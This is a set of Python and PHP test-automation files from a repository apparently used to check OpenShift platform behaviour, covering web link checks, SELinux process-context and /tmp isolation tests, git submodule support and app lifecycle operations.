Tools\",'''//div[@id='node-9475']/div/ul[4]/li[3]/a''')\n web.click_element_by_link_text(\"Connect to Openshift Origin installation with JBoss Tools\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Connect to Openshift Origin installation with JBoss Tools''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Rebuild Openshift Origin Packages\" link \n web.assert_text_equal_by_xpath(\"Rebuild Openshift Origin Packages\",'''//div[@id='node-9475']/div/ul[4]/li[4]/a''')\n 
web.click_element_by_link_text(\"Rebuild Openshift Origin Packages\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Rebuild Openshift Origin Packages''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Build Your Own PaaS\" link \n web.assert_text_equal_by_xpath(\"Build Your Own PaaS\",'''//div[@id='node-9475']/div/ul[4]/li[5]/a''')\n web.click_element_by_link_text(\"Build Your Own PaaS\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Your Own PaaS''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Build Multi-node PaaS from scratch\" link \n web.assert_text_equal_by_xpath(\"Build Multi-node PaaS from scratch\",'''//div[@id='node-9475']/div/ul[4]/li[6]/a''')\n web.click_element_by_link_text(\"Build Multi-node PaaS from scratch\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Build Multi-node PaaS from scratch''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Local Dynamic DNS Service\" link \n web.assert_text_equal_by_xpath(\"Local Dynamic DNS Service\",'''//div[@id='node-9475']/div/ul[4]/li[7]/a''')\n web.click_element_by_link_text(\"Local Dynamic DNS Service\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Local Dynamic DNS Service''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"Introduction to Cartridge Building\" link \n web.assert_text_equal_by_xpath(\"Introduction to Cartridge Building\",'''//div[@id='node-9475']/div/ul[4]/li[8]/a''')\n web.click_element_by_link_text(\"Introduction to Cartridge Building\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Introduction to Cartridge Building''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n #check the \"GitHub workflow for submitting pull requests\" link \n web.assert_text_equal_by_xpath(\"GitHub workflow for submitting pull requests\",'''//div[@id='node-9475']/div/ul[4]/li[9]/a''')\n web.click_element_by_link_text(\"GitHub workflow for submitting pull requests\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''GitHub workflow for submitting pull requests''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n\n\n\n\n #check the \"Mailing Lists\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Below is a listing of all the public mailing lists on lists.openshift.redhat.com. Click on a list name to get more information about the list, or to subscribe, unsubscribe, and change the preferences on your subscription. 
To visit the general information page for an unadvertised list, open a URL similar to this one, but with a '/' and the list name appended.''','''//body/table/tbody/tr[2]/td/p''') \n web.go_back()\n time.sleep(2)\n #check the \"For Developers\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li/ul/li/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''dev -- Developer discussions around OpenShift and OpenShift Origin''','''//body/p/table/tbody/tr/td/b/font''') \n web.go_back()\n time.sleep(2)\n #check the \"For Users\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li/ul/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''users -- User discussions around OpenShift and OpenShift Origin''','''//body/p/table/tbody/tr/td/b/font''') \n web.go_back()\n time.sleep(2)\n #check the \"Community Forums\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li[2]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Recent Threads''','''//div[@id='content']/div/div/div/div[3]/div/section/h3''') \n web.go_back()\n time.sleep(2)\n #check the \"Community Blogs\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li[3]/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Blogs''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n time.sleep(2)\n #check the \"#openshift on the irc.freenode.net IRC server\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li[4]/a''')\n time.sleep(2)\n web.check_title('''Connection details - freenode Web IRC''')\n web.go_back()\n time.sleep(2)\n #check the \"#openshift-dev on the irc.freenode.net IRC server\" link \n web.click_element_by_xpath('''//div[@id='node-9475']/div/ul[5]/li[5]/a''')\n time.sleep(2)\n web.check_title('''Connection details - freenode Web IRC''')\n web.go_back()\n time.sleep(2)\n\n\n\n\n #check the \"FAQ: Frequently Asked Questions\" link \n web.assert_text_equal_by_xpath(\"FAQ: Frequently Asked Questions\",'''//div[@id='node-9475']/div/ul[6]/li/a''')\n web.click_element_by_link_text(\"FAQ: Frequently Asked Questions\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''FAQ: Frequently Asked Questions''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back()\n \n\n\n\n\n self.tearDown()\n\n return self.passed(\" case_165717--CheckOpensourcePage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckOpensourcePage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_165717.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.43909627199172974, "alphanum_fraction": 0.4882121682167053, "avg_line_length": 28.941177368164062, "blob_id": "deebc265c2c2a0b524971f97569a50ae5f090f8a", "content_id": "b33ab683da2098024b13c010579f41f1fde6a841", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1018, "license_type": "no_license", "max_line_length": 76, "num_lines": 34, "path": "/loginfo.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import time\n\n\ndef log_filter(t1, t2, ip, file):\n \"\"\"filter useful loginfo\"\"\"\n filtered = open('filtered.txt', 'w')\n for line in file:\n start_string = line[1:25]\n try:\n 
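# note: line[1:25] strips the brackets from an Apache-style\n            # \"[Thu Feb 21 14:15:40 2013] ...\" prefix (24 characters of timestamp);\n            # strptime raises ValueError for lines without such a stamp, and the\n            # except clause below simply skips those lines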
start_time = time.strptime(start_string, \"%a %b %d %H:%M:%S %Y\")\n except Exception, e:\n continue\n if start_time >= t1 and start_time <= t2:\n print start_time\n if ip in line:\n filtered.write(line + '\\n')\n else:\n continue\n else:\n continue\n filtered.close()\n print 'DONE'\n\n\nif __name__ == '__main__':\n time1 = 'Thu Feb 21 14:15:40 2013'\n time1a = time.strptime(time1, \"%a %b %d %H:%M:%S %Y\")\n time2 = 'Thu Feb 21 14:21:46 2013'\n time2a = time.strptime(time2, \"%a %b %d %H:%M:%S %Y\")\n ip = '10.113.195.178'\n file = './error_log'\n loginfo = open(file)\n filter_result = log_filter(time1a, time2a, ip, loginfo)\n loginfo.close()\n" }, { "alpha_fraction": 0.5422943234443665, "alphanum_fraction": 0.5550405383110046, "avg_line_length": 28.409090042114258, "blob_id": "1c7e3a59099129ab67d562cb84fce839694da32f", "content_id": "389e6be99cdec93a57c5650142674f548a77e23f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2589, "license_type": "no_license", "max_line_length": 104, "num_lines": 88, "path": "/automation/open/testmodules/RT/security/selinux_scan_process.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 23, 2011\n\n\"\"\"\nimport os\nimport sys\n\nimport rhtest\nimport testcase\nimport common\nimport commands\n\n# TODO: if this failed, please refer to US1657 for more details\nclass OpenShiftTest(rhtest.Test):\n ITEST = 'DEV'\n\n def initialize(self):\n self.summary=\"[integration][rhc-selinux]SELinux separation - scan context of processes\"\n self.white_list=[\"haproxy\",]\n self.app_name = 'selinux'+common.getRandomString(5)\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%self.app_name)\n\nclass SelinuxScanProcess(OpenShiftTest):\n def test_method(self):\n ret = common.create_app(self.app_name, common.app_types[\"python\"])\n self.assert_equal(ret, 0, \"The app should be created.\")\n\n self.info(\"Check the process SELinux context\")\n ret = self.check_proc_context()\n self.assert_equal(ret, 0)\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def check_proc_context(self):\n (status, output) = common.run_remote_cmd_as_root(\"ps auxZ\")\n if status!=0:\n return 1\n\n result = 0\n for line in output.split('\\n'):\n app_without_user = 0\n if len(line)==0:\n continue\n print line \n if '/var/lib/openshift/' in line:\n app_without_user = 1\n try:\n uid = line.split()[1]\n except Exception as e:\n self.error(\"Empty line?: %s\"%e)\n continue\n if uid in self.white_list:\n continue\n if uid.isdigit() and int(uid)>=500:\n self.info(\"WHITE\")\n app_without_user = 0\n context=line.split()[0]\n if not context.split(':')[2]=='openshift_t':\n self.info(\"WARN: SELinux type of user's proc doesn't match openshift_t: %s\"%context)\n result += 1\n continue\n if not ('c'+uid)==context.split(',')[1]:\n print \"WARN: SELinux MCS label of user's proc doesn't match uid:\",context,uid\n result += 1\n if app_without_user == 1:\n print \"WARN: Tenant's proc got illegal uid:\\n\",line\n result += 1\n return result\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SelinuxScanProcess)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5506030321121216, "alphanum_fraction": 0.5568956732749939, "avg_line_length": 41.377777099609375, "blob_id": 
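A hedged sketch of the context handling that both SELinux cases above rely on (assuming the usual user:role:type:level layout printed by ls -Z and ps auxZ):\ndef context_type(context):\n    # 'system_u:object_r:libra_var_lib_t:s0' -> 'libra_var_lib_t'\n    return context.split(':')[2]\n# both tests compare only this field, e.g. context_type(ctx) == 'openshift_t'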
"e5cc190e4c1d4a47a6e59da207a11e9d38a35546", "content_id": "0ba5d2faa43f0aea00e3b1da72697a418187be77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1907, "license_type": "no_license", "max_line_length": 227, "num_lines": 45, "path": "/automation/open/testmodules/RT/cartridge/app_template/mongodb/php/mongo.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"Gear DNS: \".$_ENV['OPENSHIFT_GEAR_DNS'].\"<br />\";\n#$m = new Mongo(\"mongodb://#user:#passwd@#host:#port\");\n#$db = $m->#dbname;\n\n$m = new Mongo(\"mongodb://\".$_ENV['OPENSHIFT_MONGODB_DB_USERNAME'].\":\".$_ENV['OPENSHIFT_MONGODB_DB_PASSWORD'].\"@\".$_ENV['OPENSHIFT_MONGODB_DB_HOST'].\":\".$_ENV['OPENSHIFT_MONGODB_DB_PORT']);\n$db = $m->$_ENV['OPENSHIFT_APP_NAME'];\n\nif(!empty($_GET[\"action\"])) {\n echo \"MongoDB operations:<br />\";\n if($_GET[\"action\"] == \"insert\") {\n if(empty($_GET[\"size\"])) {\n $size = 500000;\n }\n else {\n $size = (int)$_GET[\"size\"];\n }\n echo \"db.data.insert({data: \\\"This is testing data for testing snapshoting and restoring big data in mongodb database.This is testing data for testing snapshoting and restoring big data in mongodb database.\\\"})<br />\";\n for($i = 0; $i < $size; $i++) {\n $db->info->insert(array(\"data\" => \"This is testing data for testing snapshoting and restoring big data in mongodb database.This is testing data for testing snapshoting and restoring big data in mongodb database.\"));\n }\n echo (string)$size.\" records have been inserted into mongodb<br />\";\n }\n elseif($_GET[\"action\"] == \"delete\") {\n echo \"db.info.remove()<br />\";\n $db->info->remove();\n echo \"All the records have been deleted from mongodb database<br />\";\n }\n elseif($_GET[\"action\"] == \"show\") {\n $cursor = $db->info->find();\n $num = $cursor->count();\n if($num > 0) {\n echo \"There are \".$num.\" records in database<br />Here's one record: \";\n $obj = $cursor->getNext();\n echo $obj[\"data\"].\"<br />\";\n }\n else {\n echo \"There is no record in database<br />\";\n }\n }\n else {\n echo \"[US2103][RT]Alter domain for a scaling php app which having mongodb added<br />\";\n }\n}\n?>\n" }, { "alpha_fraction": 0.6159572601318359, "alphanum_fraction": 0.6232105493545532, "avg_line_length": 37.52206039428711, "blob_id": "c342f26556e0aabd58d4778afa9c45b964728b8d", "content_id": "10ba4b0e4dc209cac3392aea9463ec32682e7334", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5239, "license_type": "no_license", "max_line_length": 166, "num_lines": 136, "path": "/automation/open/testmodules/RT/cartridge/git_submodule_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-23\n\n[US619][Runtime][rhc-cartridge]git submodule support\nhttps://tcms.engineering.redhat.com/case/138336/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport random\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n\n def initialize(self):\n #valid_variants = [\"jbossas\", \"jbosseap\", \"php\", \"ruby\", \"ruby-1.9\", \"python\", \"wsgi\", \"perl\", \"diy\", \"nodejs\"]\n valid_variants = [\"jbosseap\", \"php\", \"ruby\", \"ruby-1.9\", \"python\", \"perl\", \"diy\"]\n random.seed()\n rand = int(random.random() * 
len(valid_variants))\n self.summary = \"[US619][Runtime][rhc-cartridge]git submodule support\"\n self.app_name = \"submodule\" + common.getRandomString(4)\n self.app_type = common.app_types[valid_variants[rand]]\n self.git_repo = \"./%s\" % (self.app_name)\n self.submodule_name = \"wolfcms-example\"\n self.submodule_repo = \"https://github.com/openshift/%s.git\" % (self.submodule_name)\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass GitSubmoduleTest(OpenShiftTest):\n CODE = \"\"\"#!/usr/bin/env python\nimport os\nimport re\nimport sys\n\ngit_repo = os.path.abspath(os.environ['OPENSHIFT_REPO_DIR'])\n# Read from .gitmodules\ntry:\n f = file('%s/.gitmodules' % (git_repo), 'r')\n s = f.read()\n f.close()\nexcept:\n print('Failed to read %s/.gitmodules' % (git_repo))\n sys.exit(1)\n# Search for submodule's relative path\ntry:\n submodule_path = re.search(r'(?<=path = ).+$', s, re.M).group(0)\nexcept:\n print('Failed to find submodule dir path in .gitmodules')\n sys.exit(2)\n# Check if submodule's dir is empty\npath = '/'.join([git_repo, submodule_path])\nprint('The path of the submodule is:' + path)\ntry:\n lst = os.listdir(path)\nexcept:\n print('submodule dir %s does not exist' % path)\n sys.exit(3)\nif len(lst) == 0:\n print('Test Result: FAIL. git submodule update is not executed successfully on server')\n sys.exit(3)\nelse:\n print('Test Result: PASS. git submodule update is executed successfully on server')\n sys.exit(0)\"\"\"\n\n def test_method(self):\n # Create app\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"App creation failed\")\n # Add an public git repo as a submodule of the app\n cmd = \"cd %s && git submodule add %s\" % (self.git_repo, self.submodule_repo)\n (ret, output) = common.command_getstatusoutput(cmd)\n self.debug(output)\n self.assert_equal(ret, 0, \"Failed to add submodule\")\n # Modify .openshift/action_hooks/pre_build\n try:\n f = file(\"%s/.openshift/action_hooks/pre_build\" % (self.git_repo), \"w\")\n f.write(GitSubmoduleTest.CODE)\n f.close()\n except IOError:\n return self.failed(\"Failed to write code to %s/.openshift/action_hooks/pre_build\" % (self.git_repo))\n except:\n self.error(\"Unknown error\")\n import traceback\n traceback.print_exc()\n return self.failed(\"%s failed\" % self.__class__.__name__)\n # Git push all the changes\n cmd = \"cd %s && git add . && git commit -amt && git push\" % (self.git_repo)\n #expected_output = \"Test Result: PASS. git submodule update is executed successfully on server\"\n (ret, output) = common.command_getstatusoutput(cmd)\n self.debug(output)\n self.assert_equal(ret, 0, \"Git push failed\")\n #if output.find(expected_output) == -1:\n # return self.failed(\"%s failed\" % self.__class__.__name__)\n # Git clone the app's repo and pull down the submodule\n cmd = \"git clone %s %s-clone && cd %s-clone && git submodule init && git submodule update\" % (OSConf.get_git_url(self.app_name), self.app_name, self.app_name)\n (ret, output) = common.command_getstatusoutput(cmd)\n self.debug(output)\n self.assert_equal(ret, 0, \"Failed to git clone the repo and pull down submodule\")\n # Check if the submodule is pulled down\n self.info(\"Checking dir: %s-clone/%s\" % (self.app_name, self.submodule_name))\n try:\n lst = os.listdir(\"%s-clone/%s\" % (self.app_name, self.submodule_name))\n except OSError:\n return self.failed(\"Failed to list files under %s-clone/%s. 
The dir may not exist\" % (self.git_repo, self.submodule_name))\n except:\n self.error(\"Unknown error\")\n import traceback\n traceback.print_exc()\n return self.failed(\"%s failed\" % self.__class__.__name__)\n if len(lst) == 0:\n return self.failed(\"The git submodule isn't pulled down\")\n else:\n self.info(\"The git submodule is successfully pulled down\")\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(GitSubmoduleTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6006463766098022, "alphanum_fraction": 0.6200369596481323, "avg_line_length": 28.46258544921875, "blob_id": "6b861119335857a2ee9dbf08b3d31ebebbd984ef", "content_id": "1a3b0734bdc1efd4d51d5c8fa39e3be95b5dd0f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4332, "license_type": "no_license", "max_line_length": 128, "num_lines": 147, "path": "/automation/open/testmodules/RT/security/polyinstantiation_tmp_dir_git_push.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJianlin Liu\[email protected]\nDec 30, 2011\n[Security] Check polyinstantiation of /tmp and /var/tmp via git push\nhttps://tcms.engineering.redhat.com/case/122328/?from_plan=4962\n\"\"\"\n\nimport os\nimport sys\nimport re\n\nimport testcase\nimport common \nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[Security] Check polyinstantiation of /tmp and /var/tmp via git push\"\n self.app_type = \"python-2.6\"\n self.app_name1 = \"SecurityTestApp1\"\n self.app_name2 = \"SecurityTestApp2\"\n tcms_testcase_id=122328\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s %s\"%(self.app_name1, self.app_name2))\n\nclass PolyinstantiantionTmpDirGitPush(OpenShiftTest):\n def test_method(self):\n self.info(\"1. Create a %s application\" %(self.app_type))\n ret = common.create_app(self.app_name1, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True)\n self.assert_equal(ret, 0, \"%s app should be created successfully\" %(self.app_name1))\n\n def rewrite_app(target_file, context):\n print \"---Append test code to %s---\" %(target_file)\n file = open(target_file, \"a\")\n file.write(context)\n file.close()\n\n target_file = self.app_name1 + \"/setup.py\"\n test_code = \"\"\"\nimport commands\n \nf = open('/tmp/wsgi_tmp_test_git_push', 'w')\nf.write('testing')\nf.close()\n \nf = open('/var/tmp/wsgi_var_tmp_test_git_push', 'w')\nf.write('testing')\nf.close()\n \ncommand1 = \"ls -l /tmp/wsgi_tmp_test_git_push\"\nprint \"Command 1: %s\" %(command1)\n(ret1, output) = commands.getstatusoutput(command1)\nprint output\n \ncommand2 = \"ls -l /var/tmp/wsgi_var_tmp_test_git_push\"\nprint \"Command 2: %s\" %(command2)\n(ret2, output) = commands.getstatusoutput(command2)\nprint output\n \ncommand = \"ls -l /tmp\"\nprint \"Command: %s\" %(command)\n(tmp_ret, output) = commands.getstatusoutput(command)\nprint output\n \nif ret1 == 0 and ret2 == 0:\n print \"RESULT=0\"\nelse:\n print \"RESULT=1\"\n\"\"\"\n\n self.info(\"2. Modify setup.py\")\n rewrite_app(target_file, test_code)\n\n self.info(\"3.Do git commit\")\n (ret, output) = common.command_getstatusoutput(\"cd %s && git add . 
&& git commit -m test && git push\" %(self.app_name1))\n\n self.assert_equal(ret, 0)\n if (not re.search(r\"RESULT=0\", output)):\n self.assert_failed(\"Missing RESULT=0 in git output\")\n\n self.info(\"Create another application\")\n ret = common.create_app(self.app_name2, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True)\n self.assert_equal(ret, 0, \"%s app#2 should be created successfully\" %(self.app_name2))\n\n target_file = self.app_name2 + \"/setup.py\"\n test_code = \"\"\"\nimport commands\n \ncommand1 = \"ls -l /tmp/wsgi_tmp_test_git_push\"\nprint \"Command 1: %s\" %(command1)\n(ret1, output) = commands.getstatusoutput(command1)\nprint output\n \ncommand2 = \"ls -l /var/tmp/wsgi_var_tmp_test_git_push\"\nprint \"Command 2: %s\" %(command2)\n(ret2, output) = commands.getstatusoutput(command2)\nprint output\n \ncommand = \"ls -l /tmp\"\nprint \"Command: %s\" %(command)\n(tmp_ret, output) = commands.getstatusoutput(command)\nprint output\n \nif ret1 == 0 or ret2 == 0:\n print \"RESULT=0\"\nelse:\n print \"RESULT=1\"\n\"\"\"\n self.info(\"Modify setup.py\") \n rewrite_app(target_file, test_code)\n \n self.info(\"Do git commit\")\n (ret, output) = common.command_getstatusoutput(\"cd %s && git add . && git commit -m test && git push\" %(self.app_name2))\n\n self.assert_equal(ret, 0)\n if (not re.search(r\"RESULT=1\", output) or not re.search(r\"No such file or directory\", output)):\n self.assert_failed(\"Missing RESULT=0 in git output\")\n\n\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PolyinstantiantionTmpDirGitPush)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6335577964782715, "alphanum_fraction": 0.645903468132019, "avg_line_length": 25.984848022460938, "blob_id": "4bbf1690de16e1252e158afc169a369a2e3ff4a0", "content_id": "0758a540a19401aa99c9a66b0a1d15d5ff79e71a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1782, "license_type": "no_license", "max_line_length": 124, "num_lines": 66, "path": "/automation/open/testmodules/RT/cartridge/check_gears_rsync_at_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: Use rsync jenkins like deploy to move code and libraries between gears.py\n# Date: 2012/04/05 16:44\n# Author: [email protected]\n# [US2087][Runtime][rhc-cartridge]Use rsync jenkins like deploy to move code and libraries between gears\n#\n\nimport sys\nimport os\nimport re\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\n#TODO: to accomplish\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.app_name = common.getRandomString(10)\n try:\n self.app_type = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php` instead.\")\n self.app_type = 'php'\n\n common.env_setup()\n\n def finalize(self):\n os.sytem(\"rm -rf %s\"%self.app_name)\n\nclass CheckGearsRsyncAtJenkins(OpenShiftTest):\n def test_method(self):\n #\"Create a scalable application via REST API\",\n ret = common.create_scalable_app(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(0,ret)\n\n ret = common.scale_up(self.app_name)\n self.assert_equal(0,ret)\n\n self.summary =\"Scale up the 
app using REST API:\" \n\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def edit_app(self):\n content='''<html> <body> <?php echo \"App DNS: \" . $_ENV[\"OPENSHIFT_GEAR_DNS\"] . \"<br />\"; ?> </body> </html> '''\n f = open(\"%s/php/index.php\"%self.app_name, \"w\")\n f.write(content)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckGearsRsyncAtJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.556612491607666, "alphanum_fraction": 0.5655707716941833, "avg_line_length": 45.269229888916016, "blob_id": "06fb8daacc4e1c4ad9b9734a6a7906285bf6f5ef", "content_id": "4be4a24be36cdaead6e006b776fea9f6cf07f4eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10828, "license_type": "no_license", "max_line_length": 146, "num_lines": 234, "path": "/automation/open/testmodules/RT/client/create_control_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport testcase, common, OSConf\nimport rhtest\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n print \"variant is not set. Running test with default `php`\"\n self.test_variant = 'jbossews'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n self.git_repo = self.app_name\n if self.test_variant == \"jenkins\":\n self.good_str = \"<script>window.location.replace\"\n self.bad_str = \"Service Temporarily Unavailable\"\n elif self.test_variant == \"diy\":\n self.good_str = \"\"\n self.bad_str = \"\"\n else:\n self.good_str = \"Welcome to\"\n self.bad_str = \"Service Temporarily Unavailable\"\n tcms_testcase_id=146360,122407, 122371, 122315\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%self.app_name)\n\n\nclass CreateControlApp(OpenShiftTest):\n def test_method(self):\n step = testcase.TestCaseStep(\"Create a %s application\" %(self.app_type),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"App should be created successfully\")\n self.steps_list.append(step)\n\n def verify(exp_str):\n if self.test_variant == \"jenkins\":\n proto = \"https\"\n else:\n proto = \"http\"\n url=OSConf.get_app_url(self.app_name)\n return common.grep_web_page(\"%s://%s\"%(proto,url), exp_str, options=\"-k -H 'Pragma: no-cache' -L \", count=4, delay=7)\n\n step = testcase.TestCaseStep(\"Check this app is available\",\n verify,\n function_parameters=[self.good_str],\n expect_return=0)\n self.steps_list.append(step)\n\n test_html = \"Welcome to OpenShift~_~\"\n type_to_cmd = {\n \"php-5.3\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/php/index.php\" % (test_html, self.git_repo),\n \"jbossas-7\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"jbosseap-6.0\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"jbossews-1.0\" : \"sed -i -e 
's/Welcome to OpenShift/%s/g' %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"jbossews-2.0\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"nodejs-0.6\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/index.html\" % (test_html, self.git_repo),\n \"python-2.6\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/wsgi/application\" % (test_html, self.git_repo),\n \"ruby-1.8\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/config.ru\" % (test_html, self.git_repo),\n \"perl-5.10\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/perl/index.pl\" % (test_html, self.git_repo),\n \"diy-0.1\" : \"echo %s >%s/testfile\" % (test_html, self.git_repo),\n \"zend-5.6\" : \"echo %s >%s/testfile\" % (test_html, self.git_repo),\n \"jenkins-1.4\" : \"echo %s >%s/testfile\" % (test_html, self.git_repo),\n \"python-2.7\" : \"sed -i -e 's/Welcome to Python-2.7/%s/g' %s/wsgi/application\" % (test_html, self.git_repo),\n \"python-3.3\" : \"sed -i -e 's/Welcome to Python-3.3/%s/g' %s/wsgi/application\" % (test_html, self.git_repo)\n }\n type_to_cmd[\"ruby-1.9\"] = type_to_cmd[\"ruby-1.8\"]\n cmd = type_to_cmd[self.app_type] + \" && cd %s && git add . && git commit -am t && git push\" % (self.git_repo)\n step = testcase.TestCaseStep(\"Make some changes in the git repo and git push\",\n cmd,\n expect_description=\"the git repo is modified successfully and git push succeeds\",\n expect_return=0)\n self.steps_list.append(step)\n\n\n step = testcase.TestCaseStep(\"Check your change take effect\",\n verify,\n function_parameters=[test_html],\n expect_return=0)\n if self.test_variant in (\"diy\", \"jenkins\", \"zend\"):\n pass\n else:\n self.steps_list.append(step)\n\n\n step = testcase.TestCaseStep(\"Stop this app\",\n \"rhc app stop %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be stopped successfully\",\n 